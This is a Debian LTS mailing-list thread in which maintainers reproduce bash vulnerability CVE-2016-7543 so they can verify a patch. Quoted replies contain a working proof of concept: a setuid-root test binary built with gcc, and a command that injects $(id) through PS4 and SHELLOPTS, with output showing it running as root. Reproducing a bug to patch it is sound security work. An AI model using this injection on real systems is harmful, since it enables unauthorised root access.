Hi Balint It was the default shell that made the difference. Thanks again for this suggestion. I can reproduce the problem now. Very good.
An interesting note is that it is only possible to escalate the privilege to root. If I change the owner of the file to www-data (and the setuid to 33) the id command is not executed as www-data. This means that the bash fix to only make a special case for root is good. I thought maybe the fix was incomplete. I'll look into the fixing part now. I have found the patch and it looks trivial. As I can reproduce it easily now (with changed default shell to bash) it should be trivial to verify whether the correction was good or not. Best regards // Ola On 7 October 2016 at 09:26, Bálint Réczey <[email protected]> wrote: > Hi, > > 2016-10-07 8:10 GMT+02:00 Ola Lundqvist <[email protected]>: > > Hi Balint > > > > Ah, it could be the default shell. I'll try that. Thanks for the > suggestion. > > > > Merely that the command id is executed is not a reproduction. It has to > be > > executed as another user than the one one executing the binary to be a > > security problem. If not it could be a bug but not a security bug > (privilege > > escalation). > > True, but it works on setuid binaries, too: > > root@debian-wheezy:/home/vagrant# ls -alh /bin/sh > lrwxrwxrwx 1 root root 4 Oct 7 07:16 /bin/sh -> bash > root@debian-wheezy:/home/vagrant# gcc -xc - -otest <<< 'int main() { > setuid(0); system("/bin/date"); }' > root@debian-wheezy:/home/vagrant# chmod 4755 ./test > root@debian-wheezy:/home/vagrant# ls -l ./test > -rwsr-xr-x 1 root root 6877 Oct 7 07:19 ./test > root@debian-wheezy:/home/vagrant# exit > exit > vagrant@debian-wheezy:~$ env -i SHELLOPTS=xtrace PS4='$(id)' ./test > uid=0(root) gid=1000(vagrant) > groups=0(root),24(cdrom),25(floppy),27(sudo),29(audio),30( > dip),44(vid/bin/date > Fri Oct 7 07:19:34 GMT 2016 > vagrant@debian-wheezy:~$ > > Cheers, > Balint > > > > > > Best regards, > > > > // Ola > > > > On 7 October 2016 at 00:12, Bálint Réczey <[email protected]> > wrote: > >> > >> Hi Ola, > >> > >> 2016-10-06 23:08 GMT+02:00 Ola Lundqvist <[email protected]>: > >> > Hi Matthias and Balint > >> > > >> > I have tried to reproduce the problem described in the openwall email. > >> > However I can not reproduce it. Have you been able to? > >> > > >> > On wheezy: > >> > ------------ > >> > ola@tigereye:/$ env -i SHELLOPTS=xtrace PS4='$(id)' ./test > >> > Thu Oct 6 20:54:07 UTC 2016 > >> > ola@tigereye:/$ ls -la test > >> > -rwsr-xr-x 1 root root 6824 Oct 6 20:52 test > >> > ola@tigereye:/$ dpkg -l bash > >> > ...CUT... > >> > ii bash 4.2+dfsg-0.1 amd64 GNU Bourne Again SHell > >> > > >> > On jessie: > >> > ola@tigereye:~/exploit$ env -i SHELLOPTS=xtrace PS4='$(id)' ./test > >> > Thu Oct 6 22:48:35 CEST 2016 > >> > >> When I set the default shell to bash it worked for me. > >> Please try with sudo dpkg-reconfigure dash. > >> > >> > ola@tigereye:~/exploit$ dpkg -l bash > >> > ...CUT... > >> > ii bash 4.3-11+b1 amd64 GNU Bourne Again SHell > >> > > >> > I think it may be because SHELLOPTS is a read-only variable. > >> > > >> > ola@tigereye:~/exploit$ SHELLOPTS=xtrace > >> > bash: SHELLOPTS: readonly variable > >> > > >> > Do you think I have made a mistake in the reproduction or is it so > that > >> > the > >> > patch was actually not on a real problem (at least in Debian). > >> > > >> > Not even if I change the code like this: > >> > ola@tigereye:~/exploit$ gcc -xc - -otest2 <<< 'int main() { > setuid(0); > >> > system("/bin/bash -c /bin/date"); }' > >> > ola@tigereye:~/exploit$ ./test2 > >> > Thu Oct 6 23:04:11 CEST 2016 > >> > ola@tigereye:~/exploit$ set -x > >> > ola@tigereye:~/exploit$ ./test2 > >> > uid=1000(ola) gid=1000(ola) > >> > > >> > groups=1000(ola),24(cdrom),25(floppy),27(sudo),29(audio),30( > dip),44(video),46(plugdev),108(netdev)./test2 > >> > Thu Oct 6 23:04:18 CEST 2016 > >> > >> This runs the command passed in PS4 thus I consider this a reproduction. > >> > >> Cheers, > >> Balnit > >> > >> > > >> > My conclusion is that there is no security hole. But I may be > mistaken. > >> > > >> > Can anyone else reproduce the issue? > >> > > >> > Best regards, > >> > > >> > // Ola > >> > > >> > On 6 October 2016 at 12:29, Ola Lundqvist <[email protected]> wrote: > >> >> > >> >> Hi Matthias > >> >> > >> >> I will look into this. > >> >> > >> >> // Ola > >> >> > >> >> On 6 October 2016 at 01:06, Matthias Klose <[email protected]> wrote: > >> >>> > >> >>> On 05.10.2016 16:02, Balint Reczey wrote: > >> >>> > Hello dear maintainer(s), > >> >>> > > >> >>> > the Debian LTS team would like to fix the security issues which > are > >> >>> > currently open in the Wheezy version of bash: > >> >>> > https://security-tracker.debian.org/tracker/CVE-2016-7543 > >> >>> > > >> >>> > Would you like to take care of this yourself? > >> >>> > >> >>> please go ahead. > >> >>> > >> >>> Matthias > >> >>> > >> >> > >> >> > >> >> > >> >> -- > >> >> --- Inguza Technology AB --- MSc in Information Technology ---- > >> >> / [email protected] Folkebogatan 26 \ > >> >> | [email protected] 654 68 KARLSTAD | > >> >> | http://inguza.com/ Mobile: +46 (0)70-332 1551 | > >> >> \ gpg/f.p.: 7090 A92B 18FE 7994 0C36 4FE4 18A1 B1CF 0FE5 3DD9 / > >> >> --------------------------------------------------------------- > >> >> > >> > > >> > > >> > > >> > -- > >> > --- Inguza Technology AB --- MSc in Information Technology ---- > >> > / [email protected] Folkebogatan 26 \ > >> > | [email protected] 654 68 KARLSTAD | > >> > | http://inguza.com/ Mobile: +46 (0)70-332 1551 | > >> > \ gpg/f.p.: 7090 A92B 18FE 7994 0C36 4FE4 18A1 B1CF 0FE5 3DD9 / > >> > --------------------------------------------------------------- > >> > > > > > > > > > > > -- > > --- Inguza Technology AB --- MSc in Information Technology ---- > > / [email protected] Folkebogatan 26 \ > > | [email protected] 654 68 KARLSTAD | > > | http://inguza.com/ Mobile: +46 (0)70-332 1551 | > > \ gpg/f.p.: 7090 A92B 18FE 7994 0C36 4FE4 18A1 B1CF 0FE5 3DD9 / > > --------------------------------------------------------------- > > > -- --- Inguza Technology AB --- MSc in Information Technology ---- / [email protected] Folkebogatan 26 \ | [email protected] 654 68 KARLSTAD | | http://inguza.com/ Mobile: +46 (0)70-332 1551 | \ gpg/f.p.: 7090 A92B 18FE 7994 0C36 4FE4 18A1 B1CF 0FE5 3DD9 / ---------------------------------------------------------------
